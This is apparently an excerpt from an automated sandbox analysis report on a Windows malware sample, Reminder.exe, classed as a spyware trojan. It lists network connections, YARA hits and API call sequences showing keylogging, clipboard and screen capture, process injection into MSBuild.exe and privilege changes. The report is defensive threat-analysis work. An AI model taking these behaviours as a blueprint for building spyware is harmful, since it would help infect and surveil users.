Source: unknown	Network traffic detected: HTTP traffic on port 57911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57789
Source: unknown	Network traffic detected: HTTP traffic on port 57888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57788
Source: unknown	Network traffic detected: HTTP traffic on port 57727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57790
Source: unknown	Network traffic detected: HTTP traffic on port 57807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57792
Source: unknown	Network traffic detected: HTTP traffic on port 57968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57791
Source: unknown	Network traffic detected: HTTP traffic on port 57769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57797
Source: unknown	Network traffic detected: HTTP traffic on port 57792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57799
Source: unknown	Network traffic detected: HTTP traffic on port 57750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57725
Source: unknown	Network traffic detected: HTTP traffic on port 57770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57962
Source: unknown	Network traffic detected: HTTP traffic on port 57793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57843
Source: unknown	Network traffic detected: HTTP traffic on port 57901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57971
Source: unknown	Network traffic detected: HTTP traffic on port 57809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57735
Source: unknown	Network traffic detected: HTTP traffic on port 57830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57859
Source: unknown	Network traffic detected: HTTP traffic on port 57864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57980
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57982
Source: unknown	Network traffic detected: HTTP traffic on port 57970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57747
Source: unknown	Network traffic detected: HTTP traffic on port 57865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57987
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57990
Source: unknown	Network traffic detected: HTTP traffic on port 57782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57879

Source: unknown

HTTPS traffic detected: 13.107.246.51:443 -> 192.168.2.4:57712 version: TLS 1.2

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_0074F664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

35_2_0074F664

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0074F8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		35_2_0074F8D3
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CEF8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		38_2_00CEF8D3

Source: C:\Users\user\AppData\Local\friend\Updater.exe

35_2_0074F664

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 41_2_004064C0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,

41_2_004064C0

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_0073AA95 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

35_2_0073AA95

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_00769FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		35_2_00769FB4
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00D09FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		38_2_00D09FB4

Source: Yara match	File source: Process Memory Space: Updater.exe PID: 1612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 2536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 3272, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_014B5BC9 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,

35_2_014B5BC9

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B9051 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,	35_2_014B9051
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_016688E9 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,	38_2_016688E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_00429C1A NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	41_2_00429C1A

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_0073E3CB: CreateFileW,DeviceIoControl,CloseHandle,

35_2_0073E3CB

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_0073230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

35_2_0073230F

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0073F76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		35_2_0073F76E
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CDF76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		38_2_00CDF76E

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006D7070	35_2_006D7070
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006E3AD9	35_2_006E3AD9
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0070E32F	35_2_0070E32F
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006F24CA	35_2_006F24CA
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_00706599	35_2_00706599
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0075C844	35_2_0075C844
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006F29E3	35_2_006F29E3
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006FC9C0	35_2_006FC9C0
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006ECBF0	35_2_006ECBF0
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_00706C09	35_2_00706C09
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_00742D81	35_2_00742D81
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006DCE20	35_2_006DCE20
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006DEE00	35_2_006DEE00
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006F2F23	35_2_006F2F23
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006EF0DA	35_2_006EF0DA
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_00739168	35_2_00739168
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_0076525A	35_2_0076525A
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006ED37F	35_2_006ED37F
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006F7746	35_2_006F7746
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006F1964	35_2_006F1964
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006F7975	35_2_006F7975
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006F7BD2	35_2_006F7BD2
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006DDC70	35_2_006DDC70
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_00709D1E	35_2_00709D1E
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_006F1FC1	35_2_006F1FC1
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B89A9	35_2_014B89A9
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_014B89A2	35_2_014B89A2
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C77070	38_2_00C77070
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C83AD9	38_2_00C83AD9
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CAE32F	38_2_00CAE32F
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C924CA	38_2_00C924CA
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CA6599	38_2_00CA6599
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CFC844	38_2_00CFC844
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C9C9C0	38_2_00C9C9C0
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C929E3	38_2_00C929E3
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C8CBF0	38_2_00C8CBF0
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CA6C09	38_2_00CA6C09
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CE2D81	38_2_00CE2D81
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C7EE00	38_2_00C7EE00
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C7CE20	38_2_00C7CE20
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C92F23	38_2_00C92F23
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C8F0DA	38_2_00C8F0DA
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CD9168	38_2_00CD9168
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00D0525A	38_2_00D0525A
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C8D37F	38_2_00C8D37F
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C97746	38_2_00C97746
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C91964	38_2_00C91964
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C97975	38_2_00C97975
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C97BD2	38_2_00C97BD2
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C7DC70	38_2_00C7DC70
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CA9D1E	38_2_00CA9D1E
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00C91FC1	38_2_00C91FC1
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_01668241	38_2_01668241
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_0166823A	38_2_0166823A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_0040B650	41_2_0040B650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_004051D0	41_2_004051D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_004531E2	41_2_004531E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_0044623A	41_2_0044623A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_0042E2C5	41_2_0042E2C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_004312A3	41_2_004312A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_0045C476	41_2_0045C476
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_004064C0	41_2_004064C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_00405480	41_2_00405480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_0045C596	41_2_0045C596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_00433644	41_2_00433644
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_00405730	41_2_00405730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_00449780	41_2_00449780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_00453969	41_2_00453969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_0045A9D8	41_2_0045A9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_0042EAB4	41_2_0042EAB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_00441C90	41_2_00441C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 41_2_00441D3D	41_2_00441D3D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0042B460 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0042AD72 appears 68 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00424030 appears 131 times
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: String function: 006F488E appears 34 times
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: String function: 006F1000 appears 41 times
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: String function: 006F014F appears 40 times
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: String function: 006DFA3B appears 33 times
Source: C:\edgheaa\AutoIt3.exe	Code function: String function: 00C7FA3B appears 33 times
Source: C:\edgheaa\AutoIt3.exe	Code function: String function: 00C9488E appears 34 times
Source: C:\edgheaa\AutoIt3.exe	Code function: String function: 00C91000 appears 41 times
Source: C:\edgheaa\AutoIt3.exe	Code function: String function: 00C9014F appears 40 times

Source: Reminder.exe

Static PE information: invalid certificate

Source: Reminder.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Reminder.tmp.2.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: Reminder.exe	Static PE information: Number of sections : 11 > 10
Source: Reminder.tmp.0.dr	Static PE information: Number of sections : 11 > 10
Source: Reminder.tmp.2.dr	Static PE information: Number of sections : 11 > 10

Source: Reminder.exe, 00000000.00000003.1680434117.000000000308E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs Reminder.exe
Source: Reminder.exe, 00000000.00000000.1678861774.0000000000919000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs Reminder.exe
Source: Reminder.exe, 00000000.00000003.1680920376.000000007F5BA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs Reminder.exe

Source: Reminder.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal92.troj.spyw.evad.winEXE@73/16@0/2

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_00744573 GetLastError,FormatMessageW,

35_2_00744573

Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_007321C9 AdjustTokenPrivileges,CloseHandle,	35_2_007321C9
Source: C:\Users\user\AppData\Local\friend\Updater.exe	Code function: 35_2_007327D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	35_2_007327D9
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CD21C9 AdjustTokenPrivileges,CloseHandle,	38_2_00CD21C9
Source: C:\edgheaa\AutoIt3.exe	Code function: 38_2_00CD27D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	38_2_00CD27D9

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_00745D7E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

35_2_00745D7E

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_0073E2AB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CompareStringW,CloseHandle,

35_2_0073E2AB

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_00738056 CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode,

35_2_00738056

Source: C:\Users\user\AppData\Local\friend\Updater.exe

Code function: 35_2_00743DBD CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

35_2_00743DBD

Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp

File created: C:\Users\user\AppData\Local\friend

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\cb36de7f397799e419deb9caf3a96a89
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03

Source: C:\Users\user\Desktop\Reminder.exe

File created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Reminder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
